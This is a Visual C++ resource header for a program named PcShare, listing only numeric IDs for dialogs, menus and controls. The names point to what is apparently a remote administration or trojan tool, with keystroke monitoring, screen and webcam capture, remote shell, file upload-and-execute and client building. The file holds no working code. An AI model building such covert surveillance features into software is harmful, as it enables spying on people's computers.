//{{NO_DEPENDENCIES}}
// Microsoft Developer Studio generated include file.
// Used by PcShare.rc
//
#define IDD_ABOUTBOX                    100
#define IDR_MAINFRAME                   128
#define IDR_KEYM_RIGHT                  130
#define IDB_ACTIVE                      130
#define IDI_ICON_REG_SZ                 130
#define IDC_CURSOR_LOGO                 131
#define IDB_INACTIVE                    131
#define IDC_CURSOR_WAIT                 132
#define IDB_CLOSE_DN                    132
#define IDI_ICON_FLAG                   133
#define IDB_CLOSE_UP                    133
#define IDI_ICON_COMPUTER               134
#define IDB_CLOSE_UP_GR                 134
#define IDB_MAX_DN                      135
#define IDB_MAX_UP                      136
#define IDB_MIN_DN                      137
#define IDB_MIN_UP                      138
#define IDI_ICON_REG_BIN                138
#define IDB_CLOSE_DN_GR                 139
#define IDR_MENU_FILE_TRANS             140
#define IDB_MAX_DN_GR                   140
#define IDR_MENU_TRAN_LIST              140
#define IDR_MENU_TRAN                   140
#define IDB_MAX_UP_GR                   141
#define IDB_MIN_UP_GR                   143
#define IDB_RESTORE_DN                  144
#define IDB_RESTORE_UP                  145
#define IDB_MIN_DN_GR                   146
#define IDB_RESTORE_UP_GR               147
#define IDB_RESTORE_DN_GR               148
#define IDD_DIALOG_SETUP                157
#define IDD_DIALOG_CREATE_CLIENT        158
#define IDR_MENU_FILE_MANAGER           168
#define IDR_MENU_CLIENT_MANAGER         169
#define IDR_MENU_FILE_MANA              169
#define IDR_MENU_LIST                   170
#define IDR_MENU_LOG_LIST               170
#define IDD_DIALOG_CLIENT_TITLE         171
#define IDR_MENU_FILE                   202
#define IDR_MENU_FILE_LIST              206
#define IDB_BITMAP_HELP                 220
#define IDB_BITMAP_INDEX                221
#define IDB_BITMAP_MANA                 222
#define IDB_BITMAP_SETUP                223
#define IDB_BITMAP_DELETE               224
#define IDB_BITMAP_FILE_DELETE          224
#define IDB_BITMAP_CREATE               225
#define IDB_BITMAP_TELNET               226
#define IDI_ICON_SETUP                  232
#define IDR_TOOLBAR_FRAME               269
#define IDB_BITMAP_FRAME                275
#define IDB_BITMAP_KEY                  279
#define IDB_BITMAP_MULT                 280
#define IDB_BITMAP_TLNT                 285
#define IDD_DIALOG_RENAME               288
#define IDB_BITMAP_REGEDIT              289
#define IDB_BITMAP_SERVICE              290
#define IDB_BITMAP_MULIT                291
#define IDB_BITMAP_PROC                 293
#define IDB_BITMAP_MAIN_PROC            293
#define IDB_HDRDOWN                     296
#define IDB_HDRUP                       297
#define IDI_ICON_VIDEO                  298
#define IDD_DIALOG_FTP                  304
#define IDD_DIALOG_UPDATE               305
#define IDD_DIALOG_EXECFILE             306
#define IDD_DIALOG_OPENURL              307
#define IDI_ICON_TITLE                  308
#define IDR_MENU_ICON                   309
#define IDB_BITMAP_IP                   310
#define IDD_DIALOG_TAB                  311
#define IDR_MENU_TAB                    312
#define IDD_DIALOG_VIEW                 313
#define IDI_ICON_FRAME                  316
#define IDR_MENU_DEMO                   332
#define IDI_ICON_SERVICE                334
#define IDI_ICON_SERV                   334
#define IDI_ICON_PROC                   335
#define IDI_ICON_FRAM                   336
#define IDI_ICON_FILE                   337
#define IDI_ICON_KEYM                   338
#define IDR_MENU_TLNT                   339
#define IDI_ICON_MULI                   340
#define IDD_DIALOG_MULI                 341
#define IDI_ICON_EVENT_ERROR            343
#define IDI_ICON_EVENT_NORMAL           344
#define IDD_DIALOG_TRANS_TOOLINFO       345
#define IDD_DIALOG_WAIT_TRANS           346
#define IDR_MENU_FRAME                  349
#define IDR_TOOLBAR_MULT                353
#define IDB_BITMAP_PLAY                 355
#define IDB_BITMAP_MULT_PLAY            355
#define IDB_BITMAP_STOP                 356
#define IDB_BITMAP_MULT_STOP            356
#define IDB_BITMAP_SAVE                 357
#define IDB_BITMAP_MULT_SAVE            357
#define IDB_BITMAP_BABY                 359
#define IDI_ICON_TRAN                   366
#define IDD_DIALOG_UPLOAD               367
#define IDD_DIALOG_SHOW_NEWS            371
#define IDD_DIALOG_LOGIN_DLG            372
#define IDR_AVI_WAIT                    376
#define IDR_TOOLBAR_FILE                389
#define IDR_TOOLBAR_FRAM                390
#define IDR_TOOLBAR_FIND                391
#define IDB_BITMAP_SEARCH               392
#define IDB_BITMAP_FILE_SEARCH          392
#define IDB_BITMAP_PREV                 394
#define IDB_BITMAP_FILE_PREV            394
#define IDB_BITMAP_REFRESH              395
#define IDB_BITMAP_FILE_REFRESH         395
#define IDB_BITMAP_SAVEAS               396
#define IDB_BITMAP_FILE_DL              396
#define IDD_DIALOG_SELECT_TYPE          397
#define IDR_TOOLBAR1                    407
#define IDI_ICON_RESETIP                424
#define IDI_ICON_REIP                   424
#define IDI_ICON_TLNT                   426
#define IDI_ICON_ABOUT                  428
#define IDI_ICON_CLIENT                 432
#define IDI_ICON_MULT                   437
#define IDI_ICON_USER                   438
#define IDI_ICON_HELP                   439
#define IDI_ICON_UPDATE                 441
#define IDI_ICON_EVENT                  443
#define IDB_CLOSEMSN                    446
#define IDI_ICON_ITEM_OPEN              450
#define IDI_ICON_ITEM_CLOSE             451
#define IDR_MENU_FRAM                   458
#define IDD_DIALOG_ATTRIB               459
#define IDI_ICON_USERPC                 462
#define IDI_ICON_OPEN                   463
#define IDI_ICON_LOCK                   464
#define IDI_ICON_CWND                   490
#define IDI_ICON_LOGS                   493
#define IDI_ICON_LOGTITLE               494
#define IDD_DIALOG_WAITCLIENT           495
#define IDB_BITMAP_MAIN_FILE            511
#define IDB_BITMAP_MAIN_FRAM            512
#define IDB_BITMAP_MAIN_TLNT            513
#define IDB_BITMAP_MAIN_KEYM            514
#define IDB_BITMAP_MAIN_REGT            516
#define IDB_BITMAP_MAIN_SERV            517
#define IDB_BITMAP_MAIN_MULT            518
#define IDB_BITMAP_MAIN_CWND            519
#define IDB_BITMAP_MAIN_REIP            520
#define IDB_BITMAP_MAIN_SETP            521
#define IDB_BITMAP_MAIN_CRET            522
#define IDB_BITMAP_MAIN_HELP            523
#define IDB_BITMAP_ABUT                 524
#define IDD_DIALOG_PROXY                526
#define IDB_BITMAP_MAIN_ABUT            540
#define IDI_ICON_MANA_CLIENT            554
#define IDB_BITMAP_MAIN_PROX            556
#define IDR_MENU_EDIT                   558
#define IDD_DIALOG_WAITTRANS            559
#define IDD_DIALOG_FILE_FIND            560
#define IDI_ICON_VMM                    565
#define IDB_BITMAP_VIDEO_RECORDE_START  571
#define IDB_BITMAP_VIDEO_RECORDE_STOP   573
#define IDB_BITMAP_VIDEO_SAVE           574
#define IDB_BITMAP_AUDIO_RECORDE_START  575
#define IDB_BITMAP_AUDIO_RECORDE_STOP   576
#define IDB_BITMAP_AUDIO_START          578
#define IDB_BITMAP_MAIN_DL              583
#define IDI_ICON_FILE_DOWN              584
#define IDD_DIALOG_GET_LOGIN_TYPE       586
#define IDD_DIALOG_TOSERVER             587
#define IDD_DIALOG_SOCKS                588
#define IDC_EDIT_MAX_LINK_FILE          1000
#define IDC_EDIT_VALUE                  1000
#define IDC_STATIC_FRAME                1000
#define ID_MULI_START                   1001
#define IDC_EDIT_PARAM                  1001
#define IDC_EDIT_TEMP_PATH              1002
#define IDC_EDIT_CMDLINE                1002
#define IDC_BUTTON2                     1002
#define IDC_MULI_STOP                   1002
#define IDC_BUTTON_TEMP_DIR             1003
#define IDC_BUTTON3                     1003
#define IDC_MULI_SAVE                   1003
#define IDC_EDIT_PORT                   1004
#define IDC_EDIT_MAX_LINK_MAIN          1005
#define IDC_EDIT_PROCESS                1005
#define IDC_EDIT_PORT2                  1005
#define IDC_EDIT_FILENAME               1005
#define IDC_EDIT_PORT_FILE              1006
#define IDC_EDIT_START_FILE             1006
#define IDC_EDIT_CTRL_FILE              1007
#define IDC_EDIT_REGNAME                1008
#define IDC_SPIN_MAX_LINK_FILE          1009
#define IDC_EDIT_START_DLL              1009
#define IDC_COMBO_IPLIST                1010
#define IDC_STATIC_SIZE                 1010
#define IDC_SPIN_PORT_MAIN              1011
#define IDC_EDIT_CONTROL_DLL            1011
#define IDC_STATIC_FRAMECOUNT           1011
#define IDC_CHECK_ISICON                1012
#define IDC_SPIN_MAX_LINK_MAIN          1012
#define IDC_EDIT_USER_NAME              1013
#define IDC_STATIC_DDNS                 1014
#define IDC_SPIN_PORT_FILE              1014
#define IDC_BUTTON_CREATE               1016
#define IDC_EDIT_TITLE                  1017
#define IDC_EDIT_PORT_MAIN              1018
#define IDC_EDIT_SERVICENAME            1018
#define IDC_EDIT_GROUP                  1018
#define IDC_STATIC_LINE                 1020
#define IDC_STATIC_ANIMAL               1023
#define IDC_STATIC_20CN                 1024
#define IDC_STATIC_SANPARTY             1025
#define IDC_CHECK_ISLOCAL               1026
#define IDC_STATIC_TITLE                1029
#define IDC_BUTTON_MENU                 1030
#define IDC_LIST_USER                   1032
#define IDC_EDIT_TEXT                   1033
#define IDC_EDIT_SEND                   1036
#define IDC_STATIC_TITILE               1037
#define IDC_STATIC_CMD                  1038
#define IDC_EDIT_URL                    1040
#define IDC_CHECK_ISURL                 1042
#define IDC_COMBO_ISIE                  1043
#define IDC_EDIT_USER                   1044
#define IDC_EDIT_PASS                   1045
#define IDC_PROGRESS_SHOW               1046
#define IDC_RADIO_VIP                   1049
#define IDC_RADIO_LOCALIP               1049
#define IDC_RADIO_NOVIP                 1050
#define IDC_RADIO_LOCALURL              1050
#define IDC_RADIO_VIPDDNS               1051
#define IDC_COMBO_PROC                  1057
#define IDC_EDIT_BAK_URL                1058
#define IDC_CHECK_PASS                  1059
#define IDC_STATIC_PIN                  1061
#define IDC_STATIC_PIN_SAFE             1062
#define IDC_BUTTON_FLUSH                1064
#define IDC_CHECK_UPDATE                1065
#define IDC_EDIT_ADDR_FTP               1066
#define IDC_RADIO_UPDATE                1066
#define IDC_EDIT_PATH                   1067
#define IDC_BUTTON1                     1068
#define IDC_BUTTON_FILE                 1068
#define IDCANCLE                        1068
#define IDC_BUTTON_ADDFILE              1068
#define IDC_CREATE_NETSERVER            1068
#define IDC_EDIT_PORT_FTP               1071
#define IDC_CHECK_KEYHOOK               1071
#define IDC_CHECK_URL                   1072
#define IDC_EDIT_FILE                   1074
#define IDC_COMB_PROCESS                1075
#define IDC_STATIC_QQ                   1076
#define IDC_STATIC_VER                  1077
#define IDC_CHECK_ISDEL                 1078
#define IDC_TAB_LIST                    1079
#define IDC_CHECK_ISKEY                 1079
#define IDC_EDIT_NAME                   1080
#define IDC_CHECK_ISSYS                 1080
#define IDC_COMBOBOXEX_ICON             1082
#define IDC_EDIT_SERVICE_NAME           1083
#define IDC_EDIT_SERVICE_VIEW           1084
#define IDC_COMBO_BITCOUNT              1085
#define IDC_COMBO_SLEEPTIME             1086
#define IDC_COMBO_FRAMESIZE             1087
#define IDC_RADIO_VIP2                  1088
#define IDC_COMBO_PS                    1092
#define IDC_EDIT_SERVICE                1093
#define IDC_EDIT_SLEEP                  1094
#define IDC_STATIC_TEXT                 1095
#define IDC_EDIT_SERVICE_TITLE          1095
#define IDC_CHECK_UPLOAD_EXEC           1099
#define IDC_LIST_SHOW                   1104
#define IDC_STATIC_LOSE_PIN             1108
#define IDC_STATIC_CHANGE_PIN           1109
#define IDC_STATIC_GET_PIN              1110
#define IDC_RADIO_REMOTE                1113
#define IDC_RADIO_LOCAL                 1114
#define IDC_COMBO_SIZE                  1116
#define IDC_COMBO_DEXE                  1117
#define IDC_COMBO_LEVE                  1118
#define IDC_LIST_ATTRIB                 1119
#define IDC_RADIO_TYPE                  1120
#define IDC_RADIO_TYPE2                 1121
#define IDC_COMBO_PID                   1121
#define IDC_RADIO_TYPE3                 1123
#define IDC_RADIO_SHOW                  1124
#define IDC_RADIO_SHOW2                 1125
#define ID_FILE_FIND                    1125
#define IDC_EDIT_SERVERADDR             1127
#define IDC_EDIT_SERVERPORT             1128
#define IDC_EDIT_PWD                    1129
#define IDCONNECT                       1130
#define IDC_EDIT_ADD_FILE_NAME          1131
#define ID_FILE_DES                     21993
#define ID_FILE_LOCAL                   21993
#define ID_FILE_SRC                     21994
#define ID_FILE_REMOTE                  21994
#define IDD_DIALOG_FILE_TRANS           21995
#define IDR_AVI_FILE                    21996
#define IDC_PROGRESS_FILE               21997
#define IDC_ANIMATE_FILE                21999
#define IDD_DIALOG_FINDFILE             22000
#define IDI_ICON_DISK_SOFT              30006
#define IDI_ICON_DISK_CD                30007
#define IDI_ICON_DISK_DIR               30008
#define IDI_ICON_DIR_NORMAL             30008
#define IDI_ICON_DISK_HARD              30009
#define IDI_ICON_DISK_NET               30010
#define IDI_ICON_DISK_REMOTE            30011
#define IDI_ICON_EXE                    30012
#define IDI_ICON_FILE_EXE               30012
#define IDR_MENU_DIR_RIGHT_EMPTY        30013
#define IDD_DIALOG_DIRINFO              30014
#define IDD_DIALOG_FILEINFO             30015
#define IDD_DIALOG_DISKINFO             30016
#define IDD_DIALOG_CREATEFILE           30017
#define IDR_MENU_PROC_LIST              30018
#define IDI_ICON_DIR                    30021
#define IDI_ICON_DIR_OPEN               30021
#define IDI_ICON_REGT                   30034
#define IDR_MENU_REGT_LEFT              30038
#define IDR_MENU_REGT_RIGHT             30040
#define IDR_MENU_REGT_RIGHT_EMPTY       30043
#define IDD_DIALOG_REG_EDIT_VALUE       30044
#define IDR_MENU_DIR_RIGHT              30045
#define IDR_MENU_SERVICES               30049
#define IDD_DIALOG_SERVICES             30051
#define IDD_DIALOG_WAIT_CONNECT         30052
#define IDD_DIALOG_MESS                 30052
#define IDD_DIALOG_DLSYS_DLG            30053
#define IDD_DIALOG_LINK                 30053
#define IDD_DIALOG_FILE_DL              30054
#define IDR_MENU_MANA                   30060
#define IDR_MENU_FINDFILE               30061
#define IDC_STATIC_LEN                  30062
#define IDC_STATIC_CREATETIME           30063
#define IDC_STATIC_UNUSE                30064
#define IDC_STATIC_CONTENT              30065
#define IDC_CHECK_READONLY              30066
#define IDC_STATIC_FILECOUNT            30067
#define IDC_STATIC_TYPE                 30068
#define IDC_STATIC_FAT_TYPE             30069
#define IDC_CHECK_HIDE                  30070
#define IDC_STATIC_USE                  30071
#define IDC_CHECK_ARICH                 30072
#define IDC_STATIC_MODIFYTIME           30073
#define IDC_EDIT_VOLUM                  30074
#define IDC_STATIC_ACCESSTIME           30075
#define IDC_EDIT_DIST                   30080
#define IDC_CHECK1                      30081
#define IDC_CHECK_ISPASS                30081
#define IDC_CHECK2                      30082
#define IDC_CHECK3                      30083
#define IDC_STATIC_NAME                 30084
#define IDC_EDIT_EXE                    30085
#define IDC_COMBO_TYPE                  30086
#define IDC_EDIT_DISP_NAME              30087
#define ID_DIR_RIGHT_DELETE             30098
#define ID_DIR_RIGHT_RENAME             30099
#define ID_REG_RIGHT_CREATE_INT         30100
#define ID_DIR_RIGHT_DOWNLOAD           30102
#define ID_DIR_RIGHT_ATTRIB             30104
#define ID_SERVICES_ENUM                30131
#define ID_SERVICES_START               30132
#define ID_SERVICES_STOP                30133
#define ID_SERVICES_DELETE              30134
#define ID_SERVICES_ATTRIB              30138
#define IDR_MENU_KEYM                   31062
#define IDR_MENU_EVENT                  31063
#define IDR_MENU_LOGS                   31063
#define IDR_MENU_CWND_LIST              31064
#define ID_CLIENT_MANAGER               32771
#define ID_REG_RIGHT_CREATE_STR_EXT     32771
#define ID_CLIENT_CREATE                32775
#define ID_SCAN_TOOL                    32776
#define ID_CLIENT_TITLE                 32777
#define ID_CLIENT_PRO_CLOSE             32778
#define ID_CLIENT_PRO_UNINSTALL         32779
#define ID_CLIENT_PC_SHUTDOWN           32780
#define ID_CLIENT_PC_RESTART            32781
#define ID_CLIENT_DELETE                32782
#define ID_ALIVE_HELP                   32783
#define ID_CLIENT_PUTIN                 32784
#define ID_FILE_TRANS_DELETE_ALL        32786
#define ID_ALL_CLIENT_PRO_CLOSE         32787
#define ID_FILE_TRANS_START             32787
#define ID_ALL_CLIENT_PRO_UNINSTALL     32788
#define ID_FILE_TRANS_STOP              32788
#define ID_ALL_CLIENT_PC_CLOSE          32789
#define ID_FILE_TRANS_DELETE            32789
#define ID_ALL_CLIENT_PC_RESTART        32790
#define ID_FIND_CLIENT_TITLE            32791
#define ID_FIND_CLIENT_NOTE             32792
#define ID_FILE_STOP_ALL_TRANS          32793
#define ID_FILE_START_ALL_TRANS         32794
#define ID_FILE_STOP                    32795
#define ID_SAVE_FILE                    32795
#define ID_FILE_START                   32796
#define ID_FILE_DELETE                  32797
#define ID_LIST_DELETE_ITEM             32798
#define ID_LIST_EMPTY_ITEM              32799
#define ID_LIST_FILE_TRANS              32800
#define ID_EMPTY_FILE_TRANS             32801
#define ID_MANAGE_LOG                   32802
#define ID_STOP_FILE_TRANS              32803
#define ID_START_FILE_TRANS             32804
#define ID_DELETE_FILE_TRANS            32806
#define ID_SAVE_LIST_LOG                32807
#define ID_TELNET_WND                   32808
#define ID_MENUITEM32809                32809
#define ID_TO_TOP                       32810
#define ID_TO_BOTTOM                    32811
#define ID_STARTMOUSE                   32812
#define ID_SAVEPIC                      32813
#define ID_FRAME_MONITOR                32814
#define ID_REG_CONTROL                  32815
#define ID_SERVICE_CTRL                 32816
#define ID_PROCESS_CTRL                 32817
#define ID_KEY_MONITOR                  32818
#define ID_MULT_MONITOR                 32819
#define ID_QUERY_FILE_TRANS             32820
#define ID_MONITORKEY                   32821
#define ID_TLNT                         32822
#define ID_MODIFY_TITLE                 32823
#define ID_CLIENT_FILE_MANAGER          32824
#define ID_REGEDIT                      32825
#define ID_PROC                         32826
#define ID_SERVICE                      32827
#define ID_MUILT                        32828
#define ID_CLIENT_PROXY                 32829
#define ID_CLIENT_UPDATE_FILE           32830
#define ID_ICON_SHOW                    32831
#define ID_ICON_EXIT                    32832
#define ID_BAT_UPDATE_FILE              32833
#define ID_BAT_OPENURL                  32834
#define ID_BAT_EXEC_FILE                32835
#define ID_CLIENT_EXEC_FILE             32836
#define ID_CLIENT_OPEN_URL              32837
#define ID_FLUSH_IP                     32838
#define ID_LIST_SELECT_ALL              32839
#define ID_LIST_SELECT_NOONE            32840
#define ID_QUERY_TITLE                  32841
#define ID_QUERY_ATTRIB                 32842
#define ID_TAB_INSERT_ITEM              32843
#define ID_TAB_DELETE_ITEM              32844
#define ID_BAT_PRO_UNINSTALL            32846
#define ID_MANAGE_FILE                  32847
#define ID_DIR_PREV                     32848
#define ID_DIR_FIND_FILE                32849
#define ID_DIR_RIGHT_UPLOAD             32850
#define ID_DIR_RIGHT_UPLOAD_EXEC        32851
#define ID_PROTECT_TEXT                 32852
#define ID_CLIENT_FILE_MANA             32854
#define ID_CLIENT_MANA_FILE             32855
#define ID_CLIENT_MANA_TRAN             32856
#define ID_CLIENT_MANA_FRAM             32857
#define ID_CLIENT_MANA_TLNT             32858
#define ID_CLIENT_MANA_KEYM             32859
#define ID_CLIENT_MANA_PROC             32860
#define ID_CLIENT_MANA_SERV             32861
#define ID_CLIENT_MANA_MULI             32862
#define ID_FRAME_SEND_CTRL              32863
#define ID_FRAM_SEND_MOUSE              32864
#define ID_FRAME_SAVE_IMAGE             32865
#define ID_MULT_START                   32866
#define ID_MULT_STOP                    32867
#define ID_MULT_SAVE                    32868
#define ID_CLIENT_UPLOAD_FILE           32869
#define ID_SOFT_INFO                    32870
#define ID_FILE_FLUSH                   32871
#define ID_FILE_PREV                    32872
#define ID_TAB_EDIT_ITEM                32875
#define ID_BUTTON32876                  32876
#define ID_CLIENT_MANA_REGT             32877
#define ID_CLIENT_MANA_WIND             32878
#define ID_CLIENT_MANA_MESS             32880
#define ID_CLIENT_MANA_CWND             32881
#define ID_SYSTEM_LOGS                  32882
#define ID_CWND_FLUSH                   32883
#define ID_CWND_CLOSE                   32884
#define ID_CWND_MAX                     32885
#define ID_CWND_MIN                     32886
#define ID_CWND_HIDE                    32887
#define ID_CWND_SHOW                    32888
#define ID_CLIENT_MANA_LINK             32889
#define ID_DIR_RIGHT_EXEC               32890
#define ID_TLNT_SAVE                    32891
#define ID_CLIENT_MANA_PORT             32892
#define ID_CLIENT_MANA                  32893
#define ID_CLIENT_FRAME                 32894
#define ID_CLIENT_MULT                  32895
#define ID_CLIENT_TLNT                  32896
#define ID_CLIENT_KEYM                  32897
#define ID_CLIENT_PROX                  32898
#define ID_CLIENT_MANA_MULT             32899
#define ID_CLIENT_MANA_UNIN             32900
#define ID_LOGS_DELETE_ITEM             32901
#define ID_LOGS_EMPTY                   32902
#define ID_LOGS_SAVE                    32903
#define ID_ABOUT                        32904
#define ID_AUDIO_INIT                   32905
#define ID_AUDIO_START                  32906
#define ID_AUDIO_STOP                   32907
#define ID_USER_MODIFY_PIN              32908
#define ID_USER_GET_PIN                 32909
#define ID_USER_ADD_PIN                 32910
#define ID_RECORD_START                 32911
#define ID_RECORD_STOP                  32912
#define ID_VIDEO_INIT                   32913
#define ID_CLIENT_MANA_DL               32914
#define ID_INIT_VIDEO                   32915
#define ID_CLIENT_START_SOCKS           32916
#define ID_CLIENT_STOP_SOCKS            32917
#define ID_EMPTY                        33771
#define ID_FILE_MANA_PREV               34771
#define ID_CLIENT_FRAME_CONTROL         35772
#define ID_SAVE                         36772
#define ID_CLIENT_CHAT                  37773
#define ID_GLOBAL_SETUP                 38774
#define ID_PROCESS_FLUSH                42802
#define ID_REG_RIGHT_CREATE_STR         42826
#define ID_REG_LEFT_DELETE              42828
#define ID_DIR_CREATE                   42830
#define ID_REG_RIGHT_DELETE             42836
#define ID_DIR_FLUSH                    42846
#define ID_DIR_ATTRIB                   42849
#define ID_DIR_RIGHT_OPEN               42850
#define ID_DIR_RIGHT_SELALL             42853
#define ID_DIR_RIGHT_EXEC_SHOW          42855
#define ID_REG_RIGHT_CREATE_BIN         42857
#define ID_REG_RIGHT_MODIFY             42858
#define ID_REG_RIGHT_RENAME             42859
#define ID_REG_RIGHT_FLUSH              42860
#define ID_PROCESS_KILL                 42863
#define ID_VIEW_NORMAL                  52845
#define ID_EXIT                         60001
#define ID_FIND_RIGHT_OPEN              60003
#define IDC_EDIT_DIR                    60004
#define ID_FIND_DELETE                  60005
#define IDC_LIST_FILE                   60006
#define ID_FIND_DOWNLOAD                60007
#define ID_FIND_EXEC_SHOW               60009
#define ID_FIND_ATTRIB                  60010
#define ID_CLIENT_LINK_COUNT            61204
#define ID_FILE_TRANS_COUNT             61206
#define ID_FRAME_SIZE                   61207
#define ID_QQ                           61208
#define ID_OWNER                        61208
#define ID_FRAME_INFO                   61209
#define IDS_MYDIRFILES                  61210
#define IDS_UPDATEPANE                  61210
#define IDR_CUSTOMTYPE                  61211
#define IDS_STRING_FENZU                61211
#define IDS_STRING_FENZUZONGSHU         61212
#define IDS_STRING_CAOZUO               61213
#define IDS_STRING_PUTONGKEHUZU         61215
#define IDS_STRING_PCTITLE              61216
#define IDS_STRING_PSINFOEXT            61217
#define IDS_STRING_PSINFOVIEW           61218
#define IDS_STRING_PS_DEFAULT_VIEW      61219
#define IDS_STRING_SHEZHI               61220
#define IDS_STRING_WARNING              61221

// Next default values for new objects
// 
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
#define _APS_3D_CONTROLS                     1
#define _APS_NEXT_RESOURCE_VALUE        592
#define _APS_NEXT_COMMAND_VALUE         32918
#define _APS_NEXT_CONTROL_VALUE         1133
#define _APS_NEXT_SYMED_VALUE           103
#endif
#endif
